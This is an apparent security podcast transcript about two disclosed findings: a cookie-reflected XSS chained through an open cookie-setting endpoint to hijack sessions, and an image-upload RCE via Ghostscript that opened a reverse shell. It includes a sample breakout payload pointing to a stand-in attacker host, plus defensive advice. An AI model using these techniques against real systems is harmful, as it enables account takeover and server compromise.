Hacked & Secured: Pentest Exploits & Mitigations

Ep. 10 – Cookie XSS & Image Upload RCE: One Cookie, One File, Full Control

Amin Malekpour Season 1 Episode 10

One cookie set on a subdomain triggered XSS and stole session tokens. One fake image upload gave the attacker a reverse shell.

This episode breaks down two powerful exploits—a cookie-based XSS that bypassed frontend protections, and an RCE through Ghostscript triggered by a disguised PostScript file.

Learn how subtle misconfigurations turned everyday features into full account and server compromise.

Chapters:

00:00 - INTRO

01:08 - FINDING #1 - Cookie-Controlled XSS

12:19 - FINDING #2 - Image Upload to RCE via Ghostscript

19:03 - OUTRO

Want your pentest discovery featured? Submit your creative findings through the Google Form in the episode description, and we might showcase your finding in an upcoming episode!

🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us podcast@quailu.com.au
🔗 Podcast Website → Website Link

INTRO


What if a single cookie—set from a different subdomain—could be reflected into your HTML and quietly hijack your session?

And what if a basic logo upload box could be tricked into executing remote code… just by renaming a file?

In this episode, we’re unpacking two powerful exploits—one that turned cross-domain cookie handling into full account takeover, and another that abused Ghostscript to get a reverse shell from a fake image upload.

I’m Amin Malekpour, you’re listening to Hacked & Secured: Pentest Exploits & Mitigations, and this is the episode for the last Friday of June.

FINDING #1 - Cookie-Controlled XSS
 

Most pentesters look for XSS in the usual places—input fields, query parameters, maybe even headers. But what if I told you the injection point could be buried inside a browser cookie? And it gets even worse: that cookie wasn’t even set by the user—it was controlled by a totally different endpoint on a completely different subdomain. Now imagine that cookie gets reflected straight into the HTML of the main site. No sanitisation. No protection. Just full XSS waiting to happen.

That’s exactly what M7arm4n documented in his write-up on Medium—a cookie-based XSS vulnerability that chained together misconfigured endpoints and unsafe DOM reflection to steal user session tokens and take over accounts.

This wasn’t just one bug. It was a creative combination of smaller weaknesses chained into something serious.

Technically, it was a reflected Cross-Site Scripting bug. But this one wasn’t your typical “type something into a search box and see it pop up on the screen” situation.

Let’s break it down.

Usually, when we say “reflected XSS,” we’re talking about input that goes from the attacker, into the browser, and right back out on the page. Like putting your name in a URL parameter, and that name shows up somewhere on the site without any sanitisation. If the site doesn’t clean up the input, attackers can sneak in JavaScript instead of text.

But here’s the twist in this case: the injection point wasn’t a URL or a form field.

It was a cookie, and that’s where the Document Object Model, or DOM, comes in. The DOM is basically the page’s structure. It’s like a live map of all the HTML and elements on your screen. If something appears in the DOM, it means your browser sees it as part of the page.

And if a cookie’s value shows up in the DOM without being sanitised, that’s dangerous. Because it means an attacker could set a cookie, and then watch it get reflected on the page as live HTML.

But where it got really sneaky in this finding was how the cookie got reflected.

On one of the application’s subdomains, there was an endpoint called “slash cookies” that let anyone set a cookie just by sending a POST request. No auth needed. No referer checks. Just give it a name and value, and boom—it writes that cookie to the entire parent domain.

This meant an attacker could set a cookie and that value would be sent to any subdomain within the application.
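As a rough sketch of what that endpoint effectively did, think of a handler that blindly turns caller-supplied input into a domain-wide Set-Cookie header. The domain and cookie name below are hypothetical, not from the write-up:

```python
# Illustrative sketch of the "slash cookies" behaviour described above:
# accept any name/value pair and scope the cookie to the whole parent
# domain, with no auth and no origin checks anywhere.
def build_set_cookie_header(name: str, value: str) -> str:
    # Domain=.example.com makes the cookie visible to every subdomain,
    # including the main application that later reflects it.
    return f"Set-Cookie: {name}={value}; Domain=.example.com; Path=/"

header = build_set_cookie_header("prefs", "anything-the-caller-wants")
```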

Setting cookies like that isn’t always dangerous. Most of the time, you still can’t do much with it, right?

But in this case… the attacker noticed that the main application reflected that cookie straight into the HTML. The cookie showed up in two spots on the page. In one spot, it was inside a normal <img> tag, and that instance was properly encoded, so its content was safely treated as plain text. But in the other spot, the cookie appeared inside a <noscript> tag and wasn’t encoded at all.

And that’s where things got interesting.

Let’s take a second and explain what the <noscript> tag is.

In general, when someone has JavaScript turned off in their browser, the browser shows whatever’s inside the <noscript> tag as a backup. It’s like saying, “Hey, your JavaScript isn’t working, so here’s some alternative content.”

But here’s the catch—most people do have JavaScript turned on. And in that case, the stuff inside the <noscript> tag doesn’t actually get shown… but it’s still there in the HTML.

Now, if that <noscript> block includes something like a <script> tag or other HTML, some browsers might still try to parse it. And in certain edge cases, that can lead to unexpected behavior like your fallback code accidentally getting executed, even though it was supposed to be ignored.

Alright, let’s get back to our story. Up to this point, the attacker has two key ingredients.

First—there’s a public endpoint that lets you set cookies for the entire domain. No authentication, no validation. Just send a POST request, and the browser stores it like it came from the site itself.

Second—there’s a page on the main domain that reflects the value of a specific cookie right into a <noscript> tag. And here’s the kicker: that reflection isn’t encoded. Whatever you put in the cookie gets dropped straight into the page’s HTML.
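To see why that encoding difference matters, here’s a minimal sketch of the two reflection spots. The template, attacker URL, and function name are hypothetical—this just contrasts an escaped reflection with a raw one:

```python
import html

def render_profile(cookie_value: str) -> str:
    """Hypothetical sketch of the two reflection points described above:
    one encoded inside an <img> attribute, one dropped raw into <noscript>."""
    safe = html.escape(cookie_value, quote=True)    # < > & " ' become entities
    return (
        f'<img alt="{safe}" src="/avatar.png">\n'   # encoded: inert text
        f"<noscript>{cookie_value}</noscript>"      # raw: the vulnerability
    )

# A breakout payload of the shape described later: close </noscript>,
# then open a <script> tag pointing at an attacker-controlled server.
payload = '</noscript><script src="https://attacker.example/x.js"></script>'
page = render_profile(payload)
# In the encoded copy the markup is neutralised into entities; in the raw
# copy it becomes live HTML that escapes <noscript> and injects a script.
```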

Now pause for a second and think it through as a pentester. You’ve just found a way to set a cookie, and you know that exact cookie will later be reflected directly into the HTML—no sanitisation, no encoding.

That’s a rare opportunity, right? If this was your pentest, how would you turn this into something exploitable?

Well, here’s what the attacker actually did.

They start by building a webpage on a domain they fully control. Think of it like a phishing site or a trap page—it’s not part of the vulnerable app, but it can still interact with it.

Now, to get victims onto that page, the attacker has options:

  • They might send a phishing email with a link.
  • Or drop it into a forum or comment thread where users of the app are active.
  • Or even embed it inside a malicious ad that silently loads on other websites.

The goal? Trick users into visiting the external page—where the real attack begins.

When a victim lands on the attacker’s page, a script runs in the background. It quietly sends a cross-origin POST request to the vulnerable application’s /cookies endpoint.

This endpoint allows anyone to set a cookie on the app’s domain—without validating the request’s origin or checking who’s making it.

Now the victim’s browser has a cookie scoped to the vulnerable app’s domain. And that cookie contains a malicious payload: a script tag, wrapped in a way that’s meant to break out of a <noscript> tag and load a second-stage script from the attacker’s server.

That’s Stage One of the attack.

The attacker’s page then redirects the victim to a real page on the vulnerable app. This page reflects that cookie directly into a <noscript> tag—without any encoding or sanitisation.

So what happens?

The browser loads the page, sees the cookie, inserts it into the DOM, and... the payload executes.

The <script> tag runs, and the second-stage code—hosted by the attacker—gets full control of the page context.

Now we enter Stage Two of the attack, where the real damage begins.

The injected script—hosted by the attacker—runs inside the victim’s browser. But instead of trying to access cookies directly, which wouldn’t work because they’re marked HttpOnly, it does something smarter. HttpOnly is a security flag you can set on cookies to make them inaccessible to JavaScript. If a cookie is marked HttpOnly, scripts running in the browser can’t read its value using document.cookie. This is meant to protect session cookies from being stolen via XSS.
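As a small illustration of that flag, here’s how a server could mint a session cookie with HttpOnly set, sketched with Python’s standard library. The cookie name and value are made up:

```python
from http.cookies import SimpleCookie

# Sketch: marking a session cookie HttpOnly (and Secure) on the server,
# so document.cookie in the browser can't read it.
cookie = SimpleCookie()
cookie["session"] = "abc123"
cookie["session"]["httponly"] = True   # invisible to JavaScript
cookie["session"]["secure"] = True     # only sent over HTTPS
header = cookie.output()               # e.g. "Set-Cookie: session=abc123; HttpOnly; Secure"
```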

So, instead of trying to access cookies directly, the script sends a GET request back to the “slash cookies” endpoint—but this time it’s asking for the value of the session cookie. Even though JavaScript can’t read the cookie directly, the browser still sends it along with the request.

The key point is: the attacker’s page doesn’t have to be on the same domain. Because the cookie-setting endpoint accepts cross-origin requests, as long as the withCredentials flag is set to true, the browser will still send and receive cookies for the main application’s domain. withCredentials is a flag in JavaScript that tells the browser, “Hey, include cookies with this request—even if it’s cross-origin.” And the browser listens. As long as the server doesn’t block it, the victim’s session cookie gets sent along automatically.

And the “slash cookies” endpoint? It’s completely unprotected. It doesn’t check who’s asking or whether they’re allowed to see session data—it just replies with the raw value of the session cookie.

The attacker’s script then takes that response containing the session cookie and forwards it to their own server using another request. No alerts. No UI. No JavaScript console. Just quiet, reliable cookie theft.

And just like that… they have full session hijack. 

This is the kind of vulnerability that requires both technical depth and creative thinking. The attacker had to:

  • Discover an open cookie-setting endpoint.
  • Figure out that a specific cookie was reflected into the DOM.
  • Inject a payload that escaped the <noscript> tag and executed.
  • Chain it with a second-stage request that bypassed CORS and exfiltrated a secure token.

All without ever touching a traditional input field.

Could this attack still work today?

Absolutely—if you’re not careful. Subdomain-controlled endpoints are everywhere. And developers often forget that client-side cookie access isn’t the only risk. Sometimes, it’s the server that reflects them back into dangerous places.

Alright, if you’re building, designing, or securing applications, here’s how to prevent this kind of issue:

First—never reflect cookie values directly into the page, especially not inside things like <img> or <noscript> tags. If you really need to show a cookie value, make sure it’s properly encoded and you’re only using data you fully trust.

Second—don’t expose endpoints that let users set cookies, especially not without strict checks. If an attacker can set a cookie for someone else, that’s game over. Use a strict allowlist of which cookies can be set, check the Referer or Origin headers to verify where the request came from, and block anything that looks suspicious.
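Those checks can be sketched as a small gatekeeper function. The allowed origin and cookie names below are purely illustrative:

```python
# Sketch of the checks described above: verify where the request came
# from (Origin header) and allowlist which cookies may be set at all.
ALLOWED_ORIGINS = {"https://app.example.com"}   # hypothetical origin
ALLOWED_COOKIES = {"theme", "locale"}           # harmless preference cookies only

def may_set_cookie(origin, name):
    if origin not in ALLOWED_ORIGINS:   # missing or foreign Origin header
        return False
    return name in ALLOWED_COOKIES      # reject session/security cookies
```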

And finally—watch your subdomains. One weak subdomain is all it takes to bring down the whole app. Audit them regularly and treat each one like it could be a potential entry point.

And, if you’re a pentester, here’s what to look for in your daily engagements:

Always check subdomains for cookie-handling endpoints. Look for anything like “slash cookies,” “set_cookie,” or similar endpoints. If you find one that lets you set a cookie for the main domain, that’s a big red flag.

Next, see where those cookies get used. Are they reflected into the HTML? Inside <script>, <img>, or <noscript> tags? That’s where things can get dangerous.

And remember: XSS doesn’t always start with an input field. Sometimes, it’s a misused browser feature. Sometimes, it’s a cookie no one thought would ever be risky.

And do not forget: the most dangerous attacks aren’t loud—they’re subtle. They slip through cracks that no one noticed… until it’s too late.

FINDING #2 - Image Upload to RCE via Ghostscript

 

We started this episode with a cookie-based XSS that let attackers hijack user sessions through a clever combination of misconfigured subdomains, unsafe DOM reflection, and a little-known trick involving the <noscript> tag. But now, let’s pivot to something of a different nature.
 
What if I told you that simply uploading a company logo could give an attacker full remote code execution on the server?
 
That’s exactly what Frans Rosen documented in a public HackerOne report—an RCE vulnerability triggered through a crafted image file. It sounds simple. Upload a file, get a shell. But what made this attack special was the unexpected chain of technologies behind it.

Let’s break this down—especially for those learning how real-world RCE chains happen.

At the core of this attack was a tool called ImageMagick. It’s used by many applications to handle images—resize them, compress them, and generate thumbnails. ImageMagick is powerful—but that power comes with risk. It supports a ton of file types, including some dangerous ones like EPS and PostScript.
 
 And here’s the problem.
 
 ImageMagick uses another program called Ghostscript to process certain types of files—especially things like PDFs, EPS, or PostScript images.

And here’s the risky part: Ghostscript can run code.

So if it’s not properly sandboxed or restricted, an attacker can upload a file that looks like an image—but actually contains malicious PostScript commands. And when the server tries to process that file using Ghostscript, it ends up executing those commands.
So let’s walk through how this attack worked.

Frans started with a feature that let users upload logos inside a report constructor. This feature accepted JPG, PNG, and other image formats.

But behind the scenes, it passed uploaded files through ImageMagick—and ImageMagick hadn’t been properly locked down.

So instead of uploading a normal image, Frans crafted a PostScript file. PostScript is a page description language—it looks like an image file to the system, but it can include code that Ghostscript will try to interpret.

His payload used a trick to trigger Ghostscript’s device configuration. It included a line that told the system: “Set your output to this command…” and then injected a bash reverse shell.

That’s it.

The attacker uploaded a file with a .jpg extension—it looked like a normal image. But inside, it actually contained PostScript code. When ImageMagick tried to process the upload, it handed it off to Ghostscript. And since Ghostscript wasn’t properly sandboxed, the server just executed the payload—no warnings, no filters.
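One way to catch a disguise like that is to check magic bytes instead of trusting the extension: real JPEGs begin with the bytes 0xFF 0xD8, while PostScript files announce themselves with the "%!PS" signature. A minimal sketch, with made-up sample bytes:

```python
# Sketch: detect a PostScript file hiding behind a .jpg extension by
# inspecting the file's leading bytes rather than its filename.
JPEG_MAGIC = b"\xff\xd8\xff"   # real JPEG files start with these bytes
PS_MAGIC = b"%!PS"             # PostScript files start with this signature

def looks_like_disguised_postscript(data: bytes) -> bool:
    return data.lstrip().startswith(PS_MAGIC)

# Illustrative samples, not the actual exploit payload.
fake_logo = b"%!PS-Adobe-3.0\n% malicious PostScript would follow here\n"
real_logo = b"\xff\xd8\xff\xe0" + b"\x00" * 16

assert looks_like_disguised_postscript(fake_logo)
assert not looks_like_disguised_postscript(real_logo)
```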
 
The reverse shell connected back to Frans’ server, giving him full remote command execution.

He could now list directories, read sensitive files, and inspect the backend system.

And here’s where it gets even better.

At first, he wasn’t sure if this was a real production server or just some isolated test instance. So he ran a few follow-up commands—like reading /etc/hosts and exploring internal directories from the shell—and that’s when he confirmed it: the server was definitely part of the live platform.

So let’s pause for a second, if you were the attacker—and you just got a shell on the server by uploading an image—what would be your next move?

Would you dump environment variables and search for credentials?

Start scanning for config files with hardcoded secrets?

Or maybe pivot deeper—looking for internal services, databases, or cloud metadata?

Remember: RCE isn’t the endgame—it’s the beginning. It’s the foothold that opens everything else.

And what makes this one so dangerous is how simple it was.

No SQL injection. No complex exploit chain. Just a weak image upload filter… and an old version of Ghostscript quietly waiting in the background.


So if you’re building, designing, or securing applications, here’s what you should do.

  • Never trust image uploads blindly. Validate the content type—not just the file extension.
  • Use a locked-down ImageMagick policy to explicitly block risky file types like PostScript, EPS, PDF, or XPS. These aren’t needed for typical image uploads.
  • Treat every upload as untrusted input, and handle it in a sandboxed environment.
  • And finally—keep your libraries up to date. This bug relied on a vulnerable Ghostscript version that had already been patched in newer releases.
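For the ImageMagick point specifically, the usual place to express that lockdown is ImageMagick’s policy.xml security policy. A fragment along these lines (the exact file location varies by install) denies the Ghostscript-handled coders outright:

```xml
<policymap>
  <!-- Deny the formats ImageMagick delegates to Ghostscript -->
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="XPS" />
</policymap>
```

With a policy like this in place, an uploaded PostScript file is rejected by ImageMagick itself before Ghostscript ever sees it.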


And, for the pentesters out there, here’s how you can find similar issues in your daily engagements:

  • Don’t just check if the server blocks certain extensions. Go deeper. Ask: What happens after the file is uploaded? Is it resized? Compressed? Parsed by tools like ImageMagick, ExifTool, or Ghostscript? Because that’s where the real danger hides.
  • Try uploading a seemingly harmless .jpg file that’s actually a PostScript file. Then monitor what the server does with it. Look for signs of execution—DNS callbacks, reverse shells, or even system errors. Those are clues the file was processed and maybe even executed.
  • Don’t trust filters on the frontend. Just because the UI says “JPG only” doesn’t mean the backend is enforcing it properly. Intercept the request with Burp Suite, change the Content-Type or filename, and see what gets through.
  • And here’s something many people miss: fingerprint the toolchain. If you suspect ImageMagick is in use, try uploading a crafted file that triggers a crash or error. The error messages or behaviour might tell you if Ghostscript is running underneath.

Sometimes, the most dangerous vulnerabilities are buried inside the features we trust the most. This one didn’t need complex chains or deep fuzzing. It was just a simple upload box. The right file. The right moment. And it ended with a shell. 

OUTRO


The most dangerous flaws we saw today didn’t rely on brute force or deep fuzzing. They slipped through because everyone trusted the wrong thing—a cookie from another subdomain, an image that wasn’t really an image, and a tool quietly running behind the scenes.

And that’s the real lesson: attackers don’t break systems by force—they move through the cracks no one’s watching.
That’s why we test. That’s why we share. And that’s why responsible disclosure matters. Because finding flaws isn’t enough—getting them fixed is what actually protects people.

If this episode opened your eyes to something new, send it to someone who’s building, testing, or securing applications. You never know—this might be the story that saves them from getting breached.

Let’s make cybersecurity knowledge accessible to all. See you in the next episode.
